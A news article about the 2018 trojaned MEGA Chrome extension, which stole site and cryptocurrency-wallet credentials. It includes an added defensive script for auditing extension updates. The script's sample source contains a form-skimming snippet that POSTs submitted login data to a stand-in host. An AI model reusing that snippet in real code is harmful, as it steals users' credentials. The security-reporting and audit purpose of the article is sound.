Compromised Mega Chrome Extension Could Steal Cryptocurrencies


Version 3.39.4 of the Mega Chrome extension has been compromised and is capable of stealing usernames and passwords. This was revealed by SerHack, a security researcher who tweeted a warning to internet users about the risk.

The specialist said:

“!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!
LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.
Version: 3.39.4
It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked @x0rz”

The information spread quickly, especially after the official Monero Twitter account reposted it, saying that a hacker could steal Monero (XMR) using the Mega Chrome extension. The Monero tweet:

“PSA: The official MEGA extension has been compromised and now includes functionality to steal your Monero: https://www.reddit.com/r/Monero/comments/9cx7cc/dont_use_mega_chrome_extension_version_3394/ …”

That the Monero community was concerned is not surprising. Not only is the coin a prime target, Monero has also been the currency of choice for cyber criminals because its privacy features make transactions hard to trace. In fact, between January and July, most malicious crypto-mining activity using scripts embedded in websites to consume visitors' CPU time was mining Monero (XMR).

A Reddit post said that the latest update to the Mega Chrome extension asked for a suspicious new permission, prompting the poster to check the extension's code manually; the extension's public GitHub repository showed no recent commit that would explain the change. According to the Reddit post, the most probable explanation is either a hacked Chrome Web Store account or an insider at Mega.

In the post the Redditor wrote,

“There was an update to the extension and Chrome asked for new permission (read data on all websites). That made me suspicious and I checked the extension code locally (which is mostly Javascript anyways). MEGA also has the source code of the extension on GitHub […] There was no commit recently. To me it looks either their Google Webstore account was hacked or someone inside MEGA did this. Pure speculation though.”

The Mega file upload and sharing service was first launched in 2013 by Kim Dotcom. The compromised version of the extension monitors the user's web activity, including visited URLs and submitted login details. That data is then sent to a server in Ukraine at www.megaopac.host, a host that has since been identified as a phishing site.

The malicious code pays particular attention to URLs associated with cryptocurrency services; when it captures login details for one of those sites, it attempts to steal the user's funds by executing a JavaScript function.

In a statement about the hack, Mega stated,

“On 4 September 2018 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore. Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market and HTTP POST requests to other sites, to a server located in Ukraine. Note that mega.nz credentials were not being exfiltrated.”
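The permission prompt the Redditor noticed and the permission string in Mega's statement ("Read and change all your data on the websites you visit") are the practical warning sign in this incident. The following script, an added example that is neither Mega's code nor the trojan's, shows how to check an extension update for that escalation offline: diff the host patterns between the old and new manifest.json, and list every host the bundled JavaScript talks to that is not the vendor's own. The two manifests, the sample content script and the host exfil.example.test are constructed for the example.

```javascript
// Added example (not MEGA's code): audit a Chrome extension update the way the
// Redditor did by hand. Two checks:
//   1. manifest.json: did the update gain broad host permissions, i.e. the
//      "read and change all your data on the websites you visit" prompt?
//   2. bundled JavaScript: which external hosts does the code contact, beyond
//      the vendor's own domains?
// The manifests and source text below are constructed for this example.

// Host patterns that grant access to every site. Manifest V2 lists host
// patterns under "permissions"; Manifest V3 moves them to "host_permissions".
const BROAD_HOST_PATTERNS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

function hostPatterns(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  // Anything with a scheme, or <all_urls>, is a host pattern rather than a named API.
  return perms.filter(p => p === '<all_urls>' || /^[a-z*]+:\/\//.test(p));
}

// Host patterns present in `updated` but not in `previous`, with the broad
// (all-sites) ones singled out so an escalation is obvious.
function permissionDelta(previous, updated) {
  const before = new Set(hostPatterns(previous));
  const added = hostPatterns(updated).filter(p => !before.has(p));
  const broad = added.filter(p => BROAD_HOST_PATTERNS.includes(p));
  return { added, broad, escalated: broad.length > 0 };
}

// Every absolute http(s) URL in the source text, reduced to hosts that are not
// the vendor's own (exact match or subdomain of an allowlisted domain).
function externalHosts(source, allowedHosts) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const host = m[1].toLowerCase();
    const own = allowedHosts.some(a => host === a || host.endsWith('.' + a));
    if (!own) hosts.add(host);
  }
  return [...hosts].sort();
}

function auditExtension(previous, updated, source, allowedHosts) {
  const delta = permissionDelta(previous, updated);
  const hosts = externalHosts(source, allowedHosts);
  return {
    escalated: delta.escalated,
    broadPermissionsAdded: delta.broad,
    externalHosts: hosts,
    verdict: delta.escalated && hosts.length > 0 ? 'REVIEW BEFORE UPDATING' : 'no red flags',
  };
}

// Constructed sample: a clean manifest versus an update that adds <all_urls>.
const cleanManifest = {
  manifest_version: 2, name: 'Sample', version: '1.0.0',
  permissions: ['storage', 'unlimitedStorage', 'https://mega.nz/*'],
};
const updatedManifest = {
  manifest_version: 2, name: 'Sample', version: '1.0.1',
  permissions: ['storage', 'unlimitedStorage', 'https://mega.nz/*', '<all_urls>'],
};

// Constructed sample source: a content script that watches for login pages and
// POSTs submitted form data to a third-party host. Not the real trojan's code.
const sampleSource = `
  const targets = ['https://www.amazon.com/ap/signin', 'https://github.com/login'];
  document.addEventListener('submit', e => {
    const data = new FormData(e.target);
    fetch('https://exfil.example.test/collect', { method: 'POST', body: data });
  });
  fetch('https://g.api.mega.co.nz/cs');
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditExtension(cleanManifest, updatedManifest, sampleSource, ['mega.nz', 'mega.co.nz']));
}
```

Run it with node after unpacking the previous and current extension directories (Chrome keeps each installed version under the profile's Extensions folder), substituting the real manifests and concatenated scripts for the constructed samples. A newly added `<all_urls>` or `*://*/*` pattern combined with any non-vendor host in the code is the cue to stop and read the diff before accepting the update, which is exactly the situation reported here.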

At the time of writing, the compromised version of the Mega Chrome extension is no longer available for download. Mega nonetheless blamed Google for removing publishers' ability to sign their own extensions, which in its view made such an attack possible.

SerHack advises users to uninstall version 3.39.4 of the Mega extension immediately.
